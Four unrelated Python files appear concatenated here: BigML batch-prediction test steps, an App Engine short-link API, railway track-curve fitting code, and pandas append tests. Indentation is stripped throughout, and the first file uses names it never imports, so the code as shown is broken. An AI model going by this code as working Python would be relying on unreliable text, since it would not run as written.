from bigml.api import get_status
from bigml.io import UnicodeReader
from read_batch_prediction_steps import (i_get_the_batch_prediction,
i_get_the_batch_centroid, i_get_the_batch_anomaly_score)
#@step(r'I create a batch prediction for the dataset with the model$')
def i_create_a_batch_prediction(step):
dataset = world.dataset.get('resource')
model = world.model.get('resource')
resource = world.api.create_batch_prediction(model, dataset)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.batch_prediction = resource['object']
world.batch_predictions.append(resource['resource'])
#@step(r'I create a batch prediction for the dataset with the ensemble$')
def i_create_a_batch_prediction_ensemble(step):
dataset = world.dataset.get('resource')
ensemble = world.ensemble.get('resource')
resource = world.api.create_batch_prediction(ensemble, dataset)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.batch_prediction = resource['object']
world.batch_predictions.append(resource['resource'])
#@step(r'I wait until the batch prediction status code is either (\d) or (-\d) less than (\d+)')
def wait_until_batch_prediction_status_code_is(step, code1, code2, secs):
start = datetime.utcnow()
i_get_the_batch_prediction(step, world.batch_prediction['resource'])
status = get_status(world.batch_prediction)
while (status['code'] != int(code1) and
status['code'] != int(code2)):
time.sleep(3)
assert datetime.utcnow() - start < timedelta(seconds=int(secs))
i_get_the_batch_prediction(step, world.batch_prediction['resource'])
status = get_status(world.batch_prediction)
assert status['code'] == int(code1)
#@step(r'I wait until the batch centroid status code is either (\d) or (-\d) less than (\d+)')
def wait_until_batch_centroid_status_code_is(step, code1, code2, secs):
start = datetime.utcnow()
i_get_the_batch_centroid(step, world.batch_centroid['resource'])
status = get_status(world.batch_centroid)
while (status['code'] != int(code1) and
status['code'] != int(code2)):
time.sleep(3)
assert datetime.utcnow() - start < timedelta(seconds=int(secs))
i_get_the_batch_centroid(step, world.batch_centroid['resource'])
status = get_status(world.batch_centroid)
assert status['code'] == int(code1)
#@step(r'I wait until the batch anomaly score status code is either (\d) or (-\d) less than (\d+)')
def wait_until_batch_anomaly_score_status_code_is(step, code1, code2, secs):
start = datetime.utcnow()
i_get_the_batch_anomaly_score(step, world.batch_anomaly_score['resource'])
status = get_status(world.batch_anomaly_score)
while (status['code'] != int(code1) and
status['code'] != int(code2)):
time.sleep(3)
assert datetime.utcnow() - start < timedelta(seconds=int(secs))
i_get_the_batch_anomaly_score(step, world.batch_anomaly_score['resource'])
status = get_status(world.batch_anomaly_score)
assert status['code'] == int(code1)
#@step(r'I wait until the batch prediction is ready less than (\d+)')
def the_batch_prediction_is_finished_in_less_than(step, secs):
wait_until_batch_prediction_status_code_is(step, FINISHED, FAULTY, secs)
#@step(r'I wait until the batch centroid is ready less than (\d+)')
def the_batch_centroid_is_finished_in_less_than(step, secs):
wait_until_batch_centroid_status_code_is(step, FINISHED, FAULTY, secs)
#@step(r'I wait until the batch anomaly score is ready less than (\d+)')
def the_batch_anomaly_score_is_finished_in_less_than(step, secs):
wait_until_batch_anomaly_score_status_code_is(step, FINISHED, FAULTY, secs)
#@step(r'I download the created predictions file to "(.*)"')
def i_download_predictions_file(step, filename):
file_object = world.api.download_batch_prediction(
world.batch_prediction, filename=res_filename(filename))
assert file_object is not None
world.output = file_object
#@step(r'I download the created centroid file to "(.*)"')
def i_download_centroid_file(step, filename):
file_object = world.api.download_batch_centroid(
world.batch_centroid, filename=res_filename(filename))
assert file_object is not None
world.output = file_object
#@step(r'I download the created anomaly score file to "(.*)"')
def i_download_anomaly_score_file(step, filename):
file_object = world.api.download_batch_anomaly_score(
world.batch_anomaly_score, filename=res_filename(filename))
assert file_object is not None
world.output = file_object
def check_rows(prediction_rows, test_rows):
for row in prediction_rows:
check_row = next(test_rows)
assert len(check_row) == len(row)
for index in range(len(row)):
dot = row[index].find(".")
if dot > 0:
try:
decs = min(len(row[index]), len(check_row[index])) - dot - 1
row[index] = round(float(row[index]), decs)
check_row[index] = round(float(check_row[index]), decs)
except ValueError:
pass
assert check_row[index] == row[index], ("Got: %s/ Expected: %s" % (row, check_row))
#@step(r'the batch prediction file is like "(.*)"')
def i_check_predictions(step, check_file):
with UnicodeReader(world.output) as prediction_rows:
with UnicodeReader(res_filename(check_file)) as test_rows:
check_rows(prediction_rows, test_rows)
#@step(r'the batch centroid file is like "(.*)"')
def i_check_batch_centroid(step, check_file):
i_check_predictions(step, check_file)
#@step(r'the batch anomaly score file is like "(.*)"')
def i_check_batch_anomaly_score(step, check_file):
i_check_predictions(step, check_file)
#@step(r'I check the batch centroid is ok')
def i_check_batch_centroid_is_ok(step):
assert world.api.ok(world.batch_centroid)
#@step(r'I check the batch anomaly score is ok')
def i_check_batch_anomaly_score_is_ok(step):
assert world.api.ok(world.batch_anomaly_score)
#@step(r'I create a batch centroid for the dataset$')
def i_create_a_batch_prediction_with_cluster(step):
dataset = world.dataset.get('resource')
cluster = world.cluster.get('resource')
resource = world.api.create_batch_centroid(cluster, dataset)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.batch_centroid = resource['object']
world.batch_centroids.append(resource['resource'])
#@step(r'I create a batch anomaly score$')
def i_create_a_batch_prediction_with_anomaly(step):
dataset = world.dataset.get('resource')
anomaly = world.anomaly.get('resource')
resource = world.api.create_batch_anomaly_score(anomaly, dataset)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.batch_anomaly_score = resource['object']
world.batch_anomaly_scores.append(resource['resource'])
#@step(r'I create a source from the batch prediction$')
def i_create_a_source_from_batch_prediction(step):
batch_prediction = world.batch_prediction.get('resource')
resource = world.api.source_from_batch_prediction(batch_prediction)
world.status = resource['code']
assert world.status == HTTP_CREATED
world.location = resource['location']
world.source = resource['object']
world.sources.append(resource['resource'])
|
|
import logging
import re
import random
import os
import time
from google.appengine.ext import ndb
from google.appengine.ext import endpoints
from google.appengine.ext import deferred
from google.appengine.api import memcache
from protorpc import remote
from model import ShortLink
import api_messages
import utils
from api_messages import CreateShortLinkMessageRequest
from api_messages import CreateShortLinkMessageResponse
from api_messages import ListShortLinkMessageRequest
from api_messages import ShortLinkMessage
from api_messages import ListShortLinkMessageResponse
from api_messages import ReadShortLinkMessageRequest
from api_messages import ReadShortLinkMessageResponse
from api_messages import DeleteShortLinkMessageRequest
from api_messages import DeleteShortLinkMessageResponse
NUM_SHARDS = 20
SHARD_KEY_TEMPLATE = 'shard-{}-{:d}'
@endpoints.api(name='shortlink', version='v1', description='Short Link API',
owner_domain="lnkr.co.za", owner_name="lnkr",
package_path="android")
class ShortLinkApi(remote.Service):
""" This is the API for managing short links. """
def ValidateInput(self, request):
""" Validate the input for a short link creation request.
Args:
request: the request to create a short link.
Returns:
A list of validation errors which is empty if there are no errors.
"""
disallowed_custom = ['index.html', 'js', 'style', 'about.html', 'api.html',
'stats.html', 'data', 'favicon', 'robots']
validation_errors = []
if request.short_link:
if not re.search(r'^[a-zA-Z0-9-.]+$', request.short_link):
validation_errors.append(('Short links can only contain letters, '
'numbers, "." or "-"'))
if request.short_link in disallowed_custom:
validation_errors.append('That short link is already in use.')
if len(request.short_link) < 3:
validation_errors.append('Custom short links must be at least 3 characters long')
if (not request.target_link) or len(request.target_link) == 0:
validation_errors.append('Please provide a target URL')
else:
if not re.search(r'^https?://', request.target_link):
validation_errors.append('The target URL provided is invalid - only http or https allowed.')
return validation_errors
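# Illustrative sketch of the validation behaviour (FakeRequest is a stand-in
# for the real request message, not part of this API):
#
#   class FakeRequest(object):
#       short_link = 'ab'                 # too short: fewer than 3 characters
#       target_link = 'ftp://example.com' # not an http/https URL
#
#   ShortLinkApi().ValidateInput(FakeRequest())
#   # -> ['Custom short links must be at least 3 characters long',
#   #     'The target URL provided is invalid - only http or https allowed.']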
def GenerateShortLinkCode(self, num_links):
""" Generate a short link code.
This generates the short link code (i.e. the XyZAbC part in
http://blah/XyZAbC. The idea came from http://en.wikipedia.org/wiki/Base_36
Generate more than one at a time in case a link is already taken.
Args:
num_links: the number of short links to generate at once.
Returns:
A list of short link codes.
"""
desired_length = 6
alphabet='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-'
result = []
for i in range(num_links):
base = []
for i in range(desired_length):
pos = random.randrange(0, len(alphabet), 1)
base.append(alphabet[pos])
result.append(''.join(base))
return result
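# Illustrative example only (the codes below are made up): each call returns
# num_links random 6-character codes drawn from the 64-symbol alphabet above,
# e.g. GenerateShortLinkCode(3) might return ['aB3x-Z', '0Qm9rT', 'Zz1p2y'].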
@endpoints.method(CreateShortLinkMessageRequest,
CreateShortLinkMessageResponse, name='create',
path= '/create', http_method = 'POST')
def CreateShortLink(self, request):
""" The API endpoint for creating a short link.
Args:
request: the API request to create a short link.
Returns:
A message containing a status code and either the created short link or a
list of error messages.
Creates a short link and stores it in datastore. The flow is
1) validate the input
2) for user-chosen short links, check if the short link exists already
3) generate n short links
3a) if all n short links are already taken, try again, if still all are
taken, give up
3b) of the short links still available, choose one at random
4) write the data to datastore
"""
chosen_link = ''
# Validate input
validation_errors = self.ValidateInput(request)
if len(validation_errors) > 0:
logging.info('Validation errors: %s' % (', '.join(validation_errors)))
return CreateShortLinkMessageResponse(status = 1, msg = validation_errors)
# Check if the short link already exists (for a custom short link)
if request.short_link:
query = ShortLink.query(ShortLink.short_link == request.short_link)
results = query.fetch(1)
if len(results) == 1:
return CreateShortLinkMessageResponse(status = 1,
msg = [('Sorry, the short link '
'you requested is already'
' taken')])
else:
# Generate a short link if a custom one wasn't requested
gen_links = self.GenerateShortLinkCode(10)
query = ShortLink.query(ShortLink.short_link.IN(gen_links))
results = query.fetch(len(gen_links))
logging.info('Found %d collisions!' % (len(results)))
if len(results) == len(gen_links):
# oh dear, all of our generated links already exist.
logging.info(' Wow, all are taken!')
gen_links = self.GenerateShortLinkCode(10)
query = ShortLink.query(ShortLink.short_link.IN(gen_links))
results = query.fetch(len(gen_links))
if len(results) == len(gen_links):
logging.info(' Wow, all of the backup ones are taken too, I give up!')
# I give up
return CreateShortLinkMessageResponse(status = 1,
msg = [('Sorry, the short link '
'you requested is already '
'taken. I really did try'
', Jim, but we just '
'don\'t have the '
'entropy!')])
else:
taken = set()
for r in results:
taken.add(r.short_link)
available = set(gen_links) - taken
chosen_link = list(available)[random.randrange(0, len(available))]
logging.info(' On second attempt, found %d available so now chose %s'
% (len(available), chosen_link))
else:
taken = set()
for r in results:
taken.add(r.short_link)
available = set(gen_links) - taken
chosen_link = list(available)[random.randrange(0, len(available))]
logging.info(' On first attempt, found %d available so now chose %s'
% (len(available), chosen_link))
short_link_in = request.short_link or chosen_link
# Choose a shard for the new entity.
# Details of this approach are here:
# https://developers.google.com/appengine/articles/sharding_counters
parent_index = random.randint(0, NUM_SHARDS - 1)
parent_key_string = SHARD_KEY_TEMPLATE.format('ShortlinkParent',
parent_index)
parent_key = ndb.Key("LinkList", parent_key_string)
link = ShortLink(parent = parent_key, short_link = short_link_in,
target_link = request.target_link,
created_date = long(time.time()*1000))
try:
link.put()
deferred.defer(utils.updateMetric, 'create',
os.getenv('HTTP_X_APPENGINE_COUNTRY'))
return CreateShortLinkMessageResponse(status = 0,
short_link = short_link_in,
target_link = request.target_link,
created_date =
long(time.time()*1000))
except Exception, e:
logging.info('Error -- failed to create the link')
logging.exception(e)
return CreateShortLinkMessageResponse(status = 1,
msg = [('Failed to create the '
'short link')])
@endpoints.method(ListShortLinkMessageRequest, ListShortLinkMessageResponse,
name='list', path='/list', http_method = 'GET')
def listShortLinks(self, request):
""" List all short links.
Gets all short links from the database.
Args:
request: the API request for list
Returns:
A message containing a list of short links.
"""
sl = ShortLink.query().order(-ShortLink.created_date).fetch(request.limit or 20)
outsl = []
for link in sl[:]:
m = ShortLinkMessage(short_link = link.short_link,
target_link = link.target_link,
created_date = link.created_date)
outsl.append(m)
deferred.defer(utils.updateMetric, 'list',
os.getenv('HTTP_X_APPENGINE_COUNTRY'))
return ListShortLinkMessageResponse(short_links = outsl)
@endpoints.method(ReadShortLinkMessageRequest, ReadShortLinkMessageResponse,
name='read', path='/read', http_method = 'GET')
def readShortLink(self, request):
""" Read a single short link.
Gets a short link from the database.
Args:
request: the API request for read
Returns:
A message containing a short link.
"""
sl = ShortLink.query(ShortLink.short_link == request.short_link).fetch(1)
if len(sl) == 0:
return ReadShortLinkMessageResponse(status = 1,
msg = 'Short link not found')
deferred.defer(utils.updateMetric, 'read',
os.getenv('HTTP_X_APPENGINE_COUNTRY'))
return ReadShortLinkMessageResponse(status = 0, short_link = sl[0].short_link)
@endpoints.method(DeleteShortLinkMessageRequest,
DeleteShortLinkMessageResponse,
name='remove', path='/remove', http_method = 'DELETE')
def deleteShortLink(self, request):
""" Delete a single short link.
Deletes a short link from the datastore.
Args:
request: the API request for delete
Returns:
A message containing the result
"""
sl = ShortLink.query(ShortLink.short_link == request.short_link).fetch(1)
if len(sl) == 0:
return DeleteShortLinkMessageResponse(status = 1,
msg = 'Short link not found')
sl[0].key.delete()
memcache.delete(request.short_link)
deferred.defer(utils.updateMetric, 'delete',
os.getenv('HTTP_X_APPENGINE_COUNTRY'))
return DeleteShortLinkMessageResponse(short_link = request.short_link, status = 0)
application = endpoints.api_server([ShortLinkApi])
|
|
# MIT License, copyright Ewan Macpherson, 2016; see LICENCE in root directory
# Curve calculations
from copy import copy
import math
from ec.common import Bearing, LinearEquation
from ec.section import TrackSection
class CurveError(Exception):
pass
class TrackCurve(TrackSection):
""" Group of track sections. Like TrackSection, takes a set of coordinates
as input but utilises methods to create curves with track sections
joining up tracks.
Additonal parameter: 'split' option for whether to split the static
curve section into multiple 500 m sections.
"""
max_length = 500
def __init__(self, curve, minimum, speed, split=True):
super(TrackCurve, self).__init__(curve, minimum, speed)
self.split_static = split
def ts_easement_curve(self, curve, end_curv):
""" Creates a TrackSection instance and returns its easement_curve
method, for operational and reading ease.
"""
ts = TrackSection(curve, self.minimum_radius, self.speed_tolerance)
return ts.easement_curve(end_curv)
def ts_static_curve(self, curve, angle_diff=None, arc_length=None):
""" Creates a TrackSection instance and returns its static_curve
method with 'angle' type, for operational and reading ease.
"""
ts = TrackSection(curve, self.minimum_radius, self.speed_tolerance)
return ts.static_curve(angle_diff, arc_length)
def find_diff_angle(self, other, apply_cw=False):
""" Finds the difference in bearing between the two tracks with
bearing A and B. If A-B > B-A then B is to the right with a
clockwise curve, and vice versa.
If apply_cw is True, the side is picked according to the already-set
self.clockwise value, even if that side has the bigger difference in
bearing.
"""
# Checks how the 2nd track is aligned wrt the 1st
if self.start.bearing.nearly_equal(other.bearing):
raise CurveError('Tracks 1 and 2 must not be parallel.')
elif (self.start.bearing - other.bearing).rad == math.pi:
# The two tracks are in opposite directions
# Check whether other track is to left or right of the starting track
start_point = (self.start.pos_x, self.start.pos_z)
start_line = LinearEquation(self.start.bearing, start_point)
right_side = (start_point[0] + math.sin(self.start.bearing.rad),
start_point[1] + math.cos(self.start.bearing.rad))
if start_line.dist((other.pos_x, other.pos_z)) == 0:
raise CurveError('The other track is on the same alignment'
' as the starting track.')
diff_b = Bearing(math.pi, rad=True)
cw = start_line.same_side((other.pos_x, other.pos_z), right_side)
if apply_cw and cw is not self.clockwise:
raise CurveError('The starting track is curved away from the '
'other track - cannot make a suitable '
'alignment.')
elif (self.start.bearing - other.bearing).rad > \
(other.bearing - self.start.bearing).rad:
# 2nd track is aligned to the right
diff_b, cw = other.bearing - self.start.bearing, True
else:
# Otherwise 2nd track is aligned to the left
diff_b, cw = self.start.bearing - other.bearing, False
if not apply_cw or self.clockwise is None:
self.clockwise = cw
return diff_b
else:
return diff_b if self.clockwise is cw else -diff_b
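# Worked example (illustrative, assuming Bearing subtraction wraps modulo
# 360 degrees): if the start track bears 010 deg and the other track bears
# 070 deg, then A-B = 300 deg and B-A = 60 deg, so the other track is to the
# right, the curve is clockwise and diff_b is 60 deg.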
def check_start_alignment(self, other):
""" Checks whether the start point is aligned towards the other track -
if it isn't, it will not be possible to extend a curve to join it.
Returns False if it doesn't, True otherwise.
Since LinearEquation.same_side(a, b) returns True if one of the
points is on the line, it follows that this method returns False
if the other alignment lies on the line.
"""
if self.start.bearing.nearly_equal(other.bearing):
raise CurveError('Tracks 1 and 2 must not be parallel.')
elif (self.start.bearing - other.bearing).rad == math.pi:
# Difference 180 deg
return False
else:
# Check how the two points are aligned to each other.
first = LinearEquation(other.bearing, (other.pos_x, other.pos_z))
start_point = (self.start.pos_x, self.start.pos_z)
second = LinearEquation(self.start.bearing, start_point)
intersect = first.intersect(second)
point_beyond = (intersect[0] + math.sin(self.start.bearing.rad),
intersect[1] + math.cos(self.start.bearing.rad))
return not first.same_side(point_beyond, start_point)
def curve_fit_radius(self, other, radius, clockwise=None):
""" Finds a curve with easement sections and static curve of a certain
radius of curvature that fits the two straight tracks.
"""
if radius < self.minimum_radius:
raise CurveError(
'Radius {0} must be greater than the minimum radius of '
'curvature.'.format(radius))
try:
if other.curvature != 0 or self.start.curvature != 0:
raise CurveError('Both tracks must be straight.')
if self.start.bearing.nearly_equal(other.bearing):
raise CurveError('Tracks 1 and 2 must not be parallel.')
elif self.start.bearing.nearly_equal(other.bearing.flip()):
# Can't fit curve of specific radius to two parallel tracks -
# 1) only one valid radius value, 2) can be placed anywhere
# along tracks.
raise CurveError('This method does not work with tracks '
'parallel in opposite directions.')
except AttributeError as err:
raise AttributeError('Tracks 1 and 2 need to be TrackCoord '
'objects.') from err
# Sets signed curvature and angle difference between 2 straight tracks
self.clockwise = clockwise
diff_angle = self.find_diff_angle(other, True)
curvature = -1 / radius if self.clockwise else 1 / radius
# Finds length of easement curve and adjusts angle diff of static curve
easement_length = self.easement_length(curvature)
static_curve_angle = diff_angle.rad - 2 * self.easement_angle(easement_length)
if static_curve_angle < 0:
# Angle diff from two easement curves bigger than angle between
# the two straight tracks; can't fit them in
raise CurveError(
'The easement curves are too long to fit within the curve; '
'consider increasing the radius of curvature.')
# Construct the 3 sections of curve
ec1 = self.ts_easement_curve(self.start, curvature)
static_length = abs(static_curve_angle / curvature)
if not self.split_static or static_length <= self.max_length:
# Single static section
static = self.ts_static_curve(ec1, static_curve_angle)
ec2 = self.ts_easement_curve(static, 0)
# Assembling into a list and copying to ensure no changed values -
# they depend on each other
curve_data = [copy(s) for s in [self.start, ec1, static, ec2]]
else:
sections = math.floor(static_length/self.max_length)
static = []
for s in range(sections):
next_section = static[s-1] if s != 0 else ec1
static += [self.ts_static_curve(next_section,
arc_length=self.max_length)]
remainder = static_length % self.max_length
static += [self.ts_static_curve(static[-1], arc_length=remainder)]
ec2 = self.ts_easement_curve(static[-1], 0)
curve_data = [copy(s) for s in [self.start, ec1] + static + [ec2]]
# Finds the required translation to align the curve with the 2 tracks
# Should already be aligned with 1st
line_track = LinearEquation(other.bearing,
(other.pos_x, other.pos_z))
line_end_point = LinearEquation(self.start.bearing,
(ec2.pos_x, ec2.pos_z))
end_point = line_track.intersect(line_end_point)
# Applies translation to each of the sections
for ts in curve_data:
ts.move(end_point[0] - ec2.pos_x, end_point[1] - ec2.pos_z)
return curve_data
def curve_fit_length(self, other, length, clockwise=None, places=4,
iterations=50):
""" Finds a curve with easement sections and static curve of a certain
length that fits the two tracks, by using the bisection method to
find the correct radius of curvature.
"""
n_floor, n_ceiling = None, None
roc = self.minimum_radius
# Let initial curve_fit_radius eval handle all the CurveExceptions
# Run loop for a set number of iterations
for j in range(iterations):
try:
curve = self.curve_fit_radius(other=other, radius=roc,
clockwise=clockwise)
except CurveError as err:
if 'The easement curves are too long' in str(err):
n_floor = roc
else:
raise
else:
static_length = sum(i.org_length for i in curve if
i.org_type == 'static')
if round(static_length - length, places) == 0:
# Accurate enough
return curve
elif static_length > length:
# Static curve too long - try reducing RoC to increase easement length
n_ceiling = roc
elif static_length < length:
# Static curve too short - try raising RoC to decrease easement length
n_floor = roc
if n_floor is not None:
if n_ceiling is not None:
roc = (n_floor + n_ceiling) / 2
else:
# No ceiling yet, so raise RoC
roc *= 2
else:
# Floor should have been set with first iteration
raise CurveError('The required radius of curvature for static '
'curve of length {} is too small.'
''.format(length))
# Loop runs out of iterations
else:
raise CurveError(
'A suitable alignment was not found after {0} iterations. '
''.format(iterations))
def curve_fit_point(self, other, add_point=None, places=4, iterations=100):
""" Extends a curve with easement sections from a point on a track,
which can be curved, to join with a straight track. Uses the
bisection method to find the correct radius of curvature by
checking if the aligned curve has reached the second track or
overshot.
places: minimum distance between easement curve and 2nd track
iterations: maximum number of iterations before giving up
"""
try:
if other.curvature != 0:
raise CurveError('The end track must be straight.')
if self.start.bearing.nearly_equal(other.bearing):
raise CurveError('Tracks 1 and 2 must not be parallel.')
except AttributeError as err:
raise AttributeError('Tracks 1 and 2 need to be TrackCoord '
'objects.') from err
if add_point is not None:
try:
self.get_static_radius(add_point)
except AttributeError as err:
raise AttributeError('Add_point must be another TrackCoord '
'object.') from err
# Setting clockwise direction if starting curvature is not straight
if self.start.curvature != 0:
self.clockwise = self.start.curvature < 0
diff_angle = self.find_diff_angle(other, True)
if diff_angle.rad > math.pi:
raise CurveError('The curved track is not aligned in the '
'same direction as the other track.')
else:
diff_angle = self.find_diff_angle(other)
if not self.check_start_alignment(other) and not \
self.start.bearing.nearly_equal(other.bearing.flip()):
# Other track behind start point, so flip CW/ACW to create a
# balloon loop instead and recalculate diff_angle
self.clockwise = not self.clockwise
diff_angle = self.find_diff_angle(other, True)
line_other = LinearEquation(bearing=other.bearing,
point=(other.pos_x, other.pos_z))
start_point = (self.start.pos_x, self.start.pos_z)
# Set upper and lower bounds, and set starting curvature
n_floor, n_ceiling = None, None
curvature = 1 / self.minimum_radius
curvature *= -1 if self.clockwise else 1
# If starting curvature is not zero, adjust diff_angle to take into
# account 'negative' section of easement curve
if self.start.curvature != 0:
pre_angle = self.easement_angle(self.easement_length(self.start.curvature))
else:
pre_angle = 0
# Ensuring it runs in a loop with a limited number of iterations
for j in range(iterations):
easement_length = self.easement_length(curvature)
static_curve_angle = diff_angle.rad - self.easement_angle(easement_length) \
- abs(self.easement_angle(easement_length) - pre_angle)
if static_curve_angle < 0:
# RoC too small; set a floor and repeat loop
n_floor = curvature
else:
if self.start.curvature != curvature:
# Usual EC -> Static -> EC setup
ec1 = self.ts_easement_curve(self.start, curvature)
curve_data = [self.start, copy(ec1)]
else:
# Skip the first easement curve
curve_data = [self.start]
static_length = abs(static_curve_angle / curvature)
# Checking if static curve is longer than 500
if not self.split_static or static_length <= self.max_length:
# Single static section
static = self.ts_static_curve(curve_data[-1],
static_curve_angle)
ec2 = self.ts_easement_curve(static, 0)
curve_data += [copy(s) for s in [static, ec2]]
# If split_static is True and longer than 500m, split
else:
sections = math.floor(static_length / self.max_length)
ls_static = []
for s in range(sections):
next_section = ls_static[s-1] if s != 0 else \
curve_data[-1]
ls_static += [self.ts_static_curve(
next_section, arc_length=self.max_length)]
# Adding the remainder section
remainder = static_length % self.max_length
ls_static += [self.ts_static_curve(ls_static[-1],
arc_length=remainder)]
ec2 = self.ts_easement_curve(ls_static[-1], 0)
curve_data += [copy(s) for s in ls_static + [ec2]]
end_point = (curve_data[-1].pos_x, curve_data[-1].pos_z)
if line_other.dist(end_point) < 10 ** (-places):
# Result accurate enough
return curve_data
elif line_other.same_side(start_point, end_point):
# Same side, ie curve hasn't reached the other track -
# need larger RoC
n_floor = curvature
elif not line_other.same_side(start_point, end_point):
# Opposite sides, ie curve overshot - need smaller RoC
n_ceiling = curvature
# Zero length of static curve but still overshot - won't work
elif not line_other.same_side(start_point, end_point) \
and static_curve_angle < 10 ** -3:
raise CurveError(
'The starting point is too close to the second track '
'for this curve - try moving the start point away.')
else:
raise ValueError('Something went wrong here - dist',
line_other.dist(end_point))
if n_floor is not None:
if n_ceiling is not None:
# Both floor and ceiling are set, so find midpoint
curvature = (n_ceiling + n_floor)/2
else:
# No ceiling set yet, so halve the curvature (ie increase the RoC)
curvature *= 1/2
else:
# Floor should have been set with first iteration
raise CurveError(
'Start point is too close to the straight track such that '
'the required RoC is smaller than the minimum.')
# Loop runs out of iterations
else:
raise CurveError(
'A suitable alignment was not found after {0} iterations. '
''.format(iterations))
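# Minimal usage sketch (the numbers and the `start`/`other` names are
# illustrative; both are expected to be TrackCoord objects with pos_x, pos_z,
# curvature and bearing attributes, as used by the methods above):
#
#   curve = TrackCurve(curve=start, minimum=500, speed=120)
#   sections = curve.curve_fit_radius(other, radius=800)
#   for ts in sections:
#       print(ts.pos_x, ts.pos_z)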
|
|
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, Series, Timestamp, date_range
import pandas._testing as tm
class TestSeriesAppend:
def test_append(self, datetime_series, string_series, object_series):
appended_series = string_series.append(object_series)
for idx, value in appended_series.items():
if idx in string_series.index:
assert value == string_series[idx]
elif idx in object_series.index:
assert value == object_series[idx]
else:
raise AssertionError("orphaned index!")
msg = "Indexes have overlapping values:"
with pytest.raises(ValueError, match=msg):
datetime_series.append(datetime_series, verify_integrity=True)
def test_append_many(self, datetime_series):
pieces = [datetime_series[:5], datetime_series[5:10], datetime_series[10:]]
result = pieces[0].append(pieces[1:])
tm.assert_series_equal(result, datetime_series)
def test_append_duplicates(self):
# GH 13677
s1 = pd.Series([1, 2, 3])
s2 = pd.Series([4, 5, 6])
exp = pd.Series([1, 2, 3, 4, 5, 6], index=[0, 1, 2, 0, 1, 2])
tm.assert_series_equal(s1.append(s2), exp)
tm.assert_series_equal(pd.concat([s1, s2]), exp)
# the result must have RangeIndex
exp = pd.Series([1, 2, 3, 4, 5, 6])
tm.assert_series_equal(
s1.append(s2, ignore_index=True), exp, check_index_type=True
)
tm.assert_series_equal(
pd.concat([s1, s2], ignore_index=True), exp, check_index_type=True
)
msg = "Indexes have overlapping values:"
with pytest.raises(ValueError, match=msg):
s1.append(s2, verify_integrity=True)
with pytest.raises(ValueError, match=msg):
pd.concat([s1, s2], verify_integrity=True)
def test_append_tuples(self):
# GH 28410
s = pd.Series([1, 2, 3])
list_input = [s, s]
tuple_input = (s, s)
expected = s.append(list_input)
result = s.append(tuple_input)
tm.assert_series_equal(expected, result)
def test_append_dataframe_raises(self):
# GH 31413
df = pd.DataFrame({"A": [1, 2], "B": [3, 4]})
msg = "to_append should be a Series or list/tuple of Series, got DataFrame"
with pytest.raises(TypeError, match=msg):
df.A.append(df)
with pytest.raises(TypeError, match=msg):
df.A.append([df])
class TestSeriesAppendWithDatetimeIndex:
def test_append(self):
rng = date_range("5/8/2012 1:45", periods=10, freq="5T")
ts = Series(np.random.randn(len(rng)), rng)
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
result = ts.append(ts)
result_df = df.append(df)
ex_index = DatetimeIndex(np.tile(rng.values, 2))
tm.assert_index_equal(result.index, ex_index)
tm.assert_index_equal(result_df.index, ex_index)
appended = rng.append(rng)
tm.assert_index_equal(appended, ex_index)
appended = rng.append([rng, rng])
ex_index = DatetimeIndex(np.tile(rng.values, 3))
tm.assert_index_equal(appended, ex_index)
# different index names
rng1 = rng.copy()
rng2 = rng.copy()
rng1.name = "foo"
rng2.name = "bar"
assert rng1.append(rng1).name == "foo"
assert rng1.append(rng2).name is None
def test_append_tz(self):
# see gh-2938
rng = date_range("5/8/2012 1:45", periods=10, freq="5T", tz="US/Eastern")
rng2 = date_range("5/8/2012 2:35", periods=10, freq="5T", tz="US/Eastern")
rng3 = date_range("5/8/2012 1:45", periods=20, freq="5T", tz="US/Eastern")
ts = Series(np.random.randn(len(rng)), rng)
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
ts2 = Series(np.random.randn(len(rng2)), rng2)
df2 = DataFrame(np.random.randn(len(rng2), 4), index=rng2)
result = ts.append(ts2)
result_df = df.append(df2)
tm.assert_index_equal(result.index, rng3)
tm.assert_index_equal(result_df.index, rng3)
appended = rng.append(rng2)
tm.assert_index_equal(appended, rng3)
def test_append_tz_explicit_pytz(self):
# see gh-2938
from pytz import timezone as timezone
rng = date_range(
"5/8/2012 1:45", periods=10, freq="5T", tz=timezone("US/Eastern")
)
rng2 = date_range(
"5/8/2012 2:35", periods=10, freq="5T", tz=timezone("US/Eastern")
)
rng3 = date_range(
"5/8/2012 1:45", periods=20, freq="5T", tz=timezone("US/Eastern")
)
ts = Series(np.random.randn(len(rng)), rng)
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
ts2 = Series(np.random.randn(len(rng2)), rng2)
df2 = DataFrame(np.random.randn(len(rng2), 4), index=rng2)
result = ts.append(ts2)
result_df = df.append(df2)
tm.assert_index_equal(result.index, rng3)
tm.assert_index_equal(result_df.index, rng3)
appended = rng.append(rng2)
tm.assert_index_equal(appended, rng3)
def test_append_tz_dateutil(self):
# see gh-2938
rng = date_range(
"5/8/2012 1:45", periods=10, freq="5T", tz="dateutil/US/Eastern"
)
rng2 = date_range(
"5/8/2012 2:35", periods=10, freq="5T", tz="dateutil/US/Eastern"
)
rng3 = date_range(
"5/8/2012 1:45", periods=20, freq="5T", tz="dateutil/US/Eastern"
)
ts = Series(np.random.randn(len(rng)), rng)
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
ts2 = Series(np.random.randn(len(rng2)), rng2)
df2 = DataFrame(np.random.randn(len(rng2), 4), index=rng2)
result = ts.append(ts2)
result_df = df.append(df2)
tm.assert_index_equal(result.index, rng3)
tm.assert_index_equal(result_df.index, rng3)
appended = rng.append(rng2)
tm.assert_index_equal(appended, rng3)
def test_series_append_aware(self):
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H", tz="US/Eastern")
rng2 = date_range("1/1/2011 02:00", periods=1, freq="H", tz="US/Eastern")
ser1 = Series([1], index=rng1)
ser2 = Series([2], index=rng2)
ts_result = ser1.append(ser2)
exp_index = DatetimeIndex(
["2011-01-01 01:00", "2011-01-01 02:00"], tz="US/Eastern", freq="H"
)
exp = Series([1, 2], index=exp_index)
tm.assert_series_equal(ts_result, exp)
